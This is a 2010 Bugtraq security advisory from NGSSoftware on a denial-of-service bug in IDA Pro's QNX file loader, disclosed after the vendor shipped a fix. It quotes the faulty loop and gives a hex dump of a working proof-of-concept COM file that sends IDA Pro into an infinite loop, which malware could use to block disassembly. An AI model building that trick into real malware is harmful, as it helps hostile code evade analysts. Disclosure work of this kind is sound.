Denial-of-Service Vulnerability in IDA Pro

From: jason@ngssoftware.com
To: bugtraq@securityfocus.com
Cc:
Subject: Denial-of-Service Vulnerability in IDA Pro
Date:


Denial-of-Service Vulnerability in IDA Pro
------------------------------------------

June 28th, 2010

=======
Summary
=======
Name: Denial-of-Service Vulnerability in IDA Pro
Release Date: June 28th, 2010
Discoverer: Jason Geffner
Version Affected: IDA Pro 3.76 through 5.6
Risk: Low
Status: Published

============
Introduction
============
This paper discusses how a binary file could be crafted to cause IDA Pro to
consume 100% of CPU resources while trying to analyze it, thus preventing
disassembling. While this vulnerability is in the QNX file loader, a functional
COM file could be crafted to masquerade as a QNX file and trigger this issue.
This vulnerability was responsibly disclosed to IDA Pro's support personnel and
this advisory was not released until a fixed build was publicly released.

==========
Background
==========
"The IDA Pro Disassembler and Debugger is an interactive, programmable,
extendible, multi-processor disassembler hosted on Windows, Linux, or Mac OS X.
IDA Pro has become the de-facto standard for the analysis of hostile code,
vulnerability research and COTS validation." [1]

========
Timeline
========
07/28/98 IDA Pro loader for QNX files written
12/31/09 Denial-of-service vulnerability discovered in IDA Pro loader for QNX
         files
12/31/09 Detailed vulnerability report responsibly disclosed to IDA Pro's
         support personnel
01/04/10 Response received from IDA Pro's support personnel, confirming
         vulnerability
06/25/10 IDA Pro 5.7 released, fixing vulnerability
06/28/10 Advisory released

=============
Vulnerability
=============
IDA Pro uses different file loaders to disassemble files of different formats
(PE, ELF, etc.). The loader for QNX files contains a vulnerability that allows
a specially crafted file to cause the loader to go into an infinite loop,
thereby consuming 100% of CPU resources and preventing disassembly.

The for-loop below is designed to iterate through each lmf_data structure in
the input file, advancing the file pointer based on sizeof(lmf_data) +
lmf_data.offset). However, if lmf_data.offset == -sizeof(lmf_data) then at is
never increased and this code will run in an infinite loop.

From \ldr\qnx\qnx.cpp(50):
  for(uint32 at = sizeof(ex.lmf_header)+ex.lmf_header.data_nbytes;
      lmf_data.segment_index != _LMF_EOF_REC;
      at += sizeof(lmf_data) + lmf_data.offset)
  {
    qlseek( li, at, 0 );
    if ( sizeof(_lmf_data) !=
            qlread( li, &lmf_data, sizeof(_lmf_data) ) ) return 0;
    switch(lmf_data.segment_index)
    {
...
      case _LMF_COMMENT_REC:
        break;
...
    }
  }

=======
Exploit
=======
While this vulnerability is in the QNX file loader, a functional COM file could
be crafted to masquerade as a QNX file and trigger this issue. As such, it
would be possible for a malware author to create a working malicious COM
program, craft it to appear as a QNX file to IDA Pro, and thus prevent IDA Pro
from being able to disassemble it. Windows 7 will correctly run such a COM
program even if it is named with a .EXE extension.

See below for a proof-of-concept COM file. When run from a command-prompt, this
program will print, "I can't be opened in IDA Pro :)". When opened in IDA Pro,
it will cause IDA Pro to spin in an infinite loop.

00000000:  00 00 34 00 00 00 b4 09 eb 02 82 01 ba 13 01 cd    ..4.............
00000010:  21 cd 20 49 20 63 61 6e 27 74 20 62 65 20 6f 70    !. I can't be op
00000020:  65 6e 65 64 20 69 6e 20 49 44 41 20 50 72 6f 20    ened in IDA Pro 
00000030:  3a 29 24 00 00 00 00 00 00 00 01 00 fa ff ff ff    :)$.............
00000040:  00 00 00 00 00 00                                  ......

==========
Conclusion
==========
In-depth code reviews and fuzzing should be performed on all software,
especially when the software is designed for analyzing malicious and/or
untrusted data.

===============
Fix Information
===============
This issue has now been resolved. IDA Pro 5.7 can be downloaded from
https://www.hex-rays.com/updida.shtml

==========
References
==========
[1] http://hex-rays.com/idapro/overview.htm

NGSSoftware Insight Security Research
http://www.ngssoftware.com/
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070





Copyright © 1995-2018 LinuxRocket.net. All rights reserved.